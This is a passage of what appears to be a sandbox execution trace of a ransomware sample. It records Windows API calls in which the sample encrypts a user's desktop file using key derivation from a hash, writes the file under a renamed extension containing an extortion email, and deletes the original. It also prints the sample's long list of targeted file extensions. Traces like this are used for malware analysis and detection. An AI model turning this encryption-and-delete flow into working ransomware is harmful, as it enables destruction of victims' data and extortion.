returned=".mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0181.400] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0181.400] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0181.400] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\desktop\\1it-vw cosug.mkv" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\1it-vw cosug.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0181.401] ReadFile (in: hFile=0x384, lpBuffer=0xfdb130, nNumberOfBytesToRead=0x991, lpNumberOfBytesRead=0x18c060, lpOverlapped=0x0 | out: lpBuffer=0xfdb130*, lpNumberOfBytesRead=0x18c060*=0x991, lpOverlapped=0x0) returned 1
	[0181.403] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0181.403] CryptAcquireContextW (in: phProv=0x18bc10, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18bc10*=0xfcb5d8) returned 1
	[0181.405] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0181.405] CryptCreateHash (in: hProv=0xfcb5d8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x18bc14 | out: phHash=0x18bc14) returned 1
	[0181.405] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0181.406] CryptHashData (hHash=0xfb9b30, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0181.406] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0181.406] CryptDeriveKey (in: hProv=0xfcb5d8, Algid=0x6610, hBaseData=0xfb9b30, dwFlags=0x1, phKey=0x18bc18 | out: phKey=0x18bc18*=0xfb9bf0) returned 1
	[0181.406] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0181.406] CryptEncrypt (in: hKey=0xfb9bf0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x18bc2c*=0x991, dwBufLen=0x991 | out: pbData=0x0*, pdwDataLen=0x18bc2c*=0x9a0) returned 1
	[0181.406] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0181.406] RtlMoveMemory (in: Destination=0xfdbf38, Source=0xfdb130, Length=0x991 | out: Destination=0xfdbf38) 
	[0181.406] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0181.407] CryptEncrypt (in: hKey=0xfb9bf0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfdbf38*, pdwDataLen=0x18bc0c*=0x991, dwBufLen=0x9a0 | out: pbData=0xfdbf38*, pdwDataLen=0x18bc0c*=0x9a0) returned 1
	[0181.408] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0181.408] CryptDestroyKey (hKey=0xfb9bf0) returned 1
	[0181.408] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0181.408] CryptDestroyHash (hHash=0xfb9b30) returned 1
	[0181.408] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0181.408] CryptReleaseContext (hProv=0xfcb5d8, dwFlags=0x0) returned 1
	[0181.408] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0181.409] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18bc28, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18bc28*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0181.409] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0181.409] GetUserNameA (in: lpBuffer=0x18bb0c, pcbBuffer=0x18bc24 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18bc24) returned 1
	[0181.411] wsprintfW (in: param_1=0x18bc40, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\rdhj0cnfevzx\\desktop\\1it-vw cosug.mkv.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 88
	[0181.411] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\desktop\\1it-vw cosug.mkv.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\1it-vw cosug.mkv.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0181.411] WriteFile (in: hFile=0x388, lpBuffer=0xfdbf38*, nNumberOfBytesToWrite=0x9a0, lpNumberOfBytesWritten=0x18c068, lpOverlapped=0x0 | out: lpBuffer=0xfdbf38*, lpNumberOfBytesWritten=0x18c068*=0x9a0, lpOverlapped=0x0) returned 1
	[0181.414] CloseHandle (hObject=0x388) returned 1
	[0181.414] CloseHandle (hObject=0x384) returned 1
	[0181.414] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\desktop\\1it-vw cosug.mkv" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\1it-vw cosug.mkv")) returned 1
	[0181.417] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\desktop\\1it-vw cosug.mkv" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\1it-vw cosug.mkv")) returned 0
	[0181.417] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x72d6080, ftCreationTime.dwHighDateTime=0x1d97af9, ftLastAccessTime.dwLowDateTime=0x72d6080, ftLastAccessTime.dwHighDateTime=0x1d97af9, ftLastWriteTime.dwLowDateTime=0x5639d00, ftLastWriteTime.dwHighDateTime=0x1d97af9, nFileSizeHigh=0x0, nFileSizeLow=0x21600, dwReserved0=0x0, dwReserved1=0x0, cFileName="3729c1d683690f752732ec18372a555abfb0d20c02ea3f9fe60ca6577722c9a8.exe", cAlternateFileName="3729C1~1.EXE")) returned 1
	[0181.418] lstrcmpW (lpString1="3729c1d683690f752732ec18372a555abfb0d20c02ea3f9fe60ca6577722c9a8.exe", lpString2="..") returned 1
	[0181.418] lstrcmpW (lpString1="3729c1d683690f752732ec18372a555abfb0d20c02ea3f9fe60ca6577722c9a8.exe", lpString2=".") returned 1
	[0181.418] lstrcpyW (in: lpString1=0x18cb04, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\"
	[0181.418] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpString2="3729c1d683690f752732ec18372a555abfb0d20c02ea3f9fe60ca6577722c9a8.exe" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\3729c1d683690f752732ec18372a555abfb0d20c02ea3f9fe60ca6577722c9a8.exe") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\3729c1d683690f752732ec18372a555abfb0d20c02ea3f9fe60ca6577722c9a8.exe"
	[0181.418] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Desktop\\3729c1d683690f752732ec18372a555abfb0d20c02ea3f9fe60ca6577722c9a8.exe") returned 98
	[0181.418] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0181.418] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Desktop\\3729c1d683690f752732ec18372a555abfb0d20c02ea3f9fe60ca6577722c9a8.exe", cchLength=0x62 | out: lpsz="c:\\users\\rdhj0cnfevzx\\desktop\\3729c1d683690f752732ec18372a555abfb0d20c02ea3f9fe60ca6577722c9a8.exe") returned 0x62
	[0181.418] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0181.419] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\desktop\\3729c1d683690f752732ec18372a555abfb0d20c02ea3f9fe60ca6577722c9a8.exe", lpSrch="help_decrypt_your_files") returned 0x0
	[0181.419] lstrcpyW (in: lpString1=0x18c6ac, lpString2="c:\\users\\rdhj0cnfevzx\\desktop\\3729c1d683690f752732ec18372a555abfb0d20c02ea3f9fe60ca6577722c9a8.exe" | out: lpString1="c:\\users\\rdhj0cnfevzx\\desktop\\3729c1d683690f752732ec18372a555abfb0d20c02ea3f9fe60ca6577722c9a8.exe") returned="c:\\users\\rdhj0cnfevzx\\desktop\\3729c1d683690f752732ec18372a555abfb0d20c02ea3f9fe60ca6577722c9a8.exe"
	[0181.419] lstrlenW (lpString="c:\\users\\rdhj0cnfevzx\\desktop\\3729c1d683690f752732ec18372a555abfb0d20c02ea3f9fe60ca6577722c9a8.exe") returned 98
	[0181.419] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0181.419] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0181.419] StrStrW (lpFirst=".exe", lpSrch=".") returned=".exe"
	[0181.419] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0181.420] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".exe") returned 0x0
	[0181.420] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb2c18d00, ftCreationTime.dwHighDateTime=0x1d966d0, ftLastAccessTime.dwLowDateTime=0x30cda3e0, ftLastAccessTime.dwHighDateTime=0x1d96cf9, ftLastWriteTime.dwLowDateTime=0x30cda3e0, ftLastWriteTime.dwHighDateTime=0x1d96cf9, nFileSizeHigh=0x0, nFileSizeLow=0x159b9, dwReserved0=0x0, dwReserved1=0x0, cFileName="7UmfwwK.bmp", cAlternateFileName="")) returned 1
	[0181.420] lstrcmpW (lpString1="7UmfwwK.bmp", lpString2="..") returned 1
	[0181.420] lstrcmpW (lpString1="7UmfwwK.bmp", lpString2=".") returned 1
	[0181.420] lstrcpyW (in: lpString1=0x18cb04, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\"
	[0181.420] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpString2="7UmfwwK.bmp" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\7UmfwwK.bmp") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\7UmfwwK.bmp"
	[0181.420] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Desktop\\7UmfwwK.bmp") returned 41
	[0181.420] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0181.421] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Desktop\\7UmfwwK.bmp", cchLength=0x29 | out: lpsz="c:\\users\\rdhj0cnfevzx\\desktop\\7umfwwk.bmp") returned 0x29
	[0181.421] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0181.421] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\desktop\\7umfwwk.bmp", lpSrch="help_decrypt_your_files") returned 0x0
	[0181.421] lstrcpyW (in: lpString1=0x18c6ac, lpString2="c:\\users\\rdhj0cnfevzx\\desktop\\7umfwwk.bmp" | out: lpString1="c:\\users\\rdhj0cnfevzx\\desktop\\7umfwwk.bmp") returned="c:\\users\\rdhj0cnfevzx\\desktop\\7umfwwk.bmp"
	[0181.421] lstrlenW (lpString="c:\\users\\rdhj0cnfevzx\\desktop\\7umfwwk.bmp") returned 41
	[0181.421] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0181.421] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0181.422] StrStrW (lpFirst=".bmp", lpSrch=".") returned=".bmp"
	[0181.422] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0181.422] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.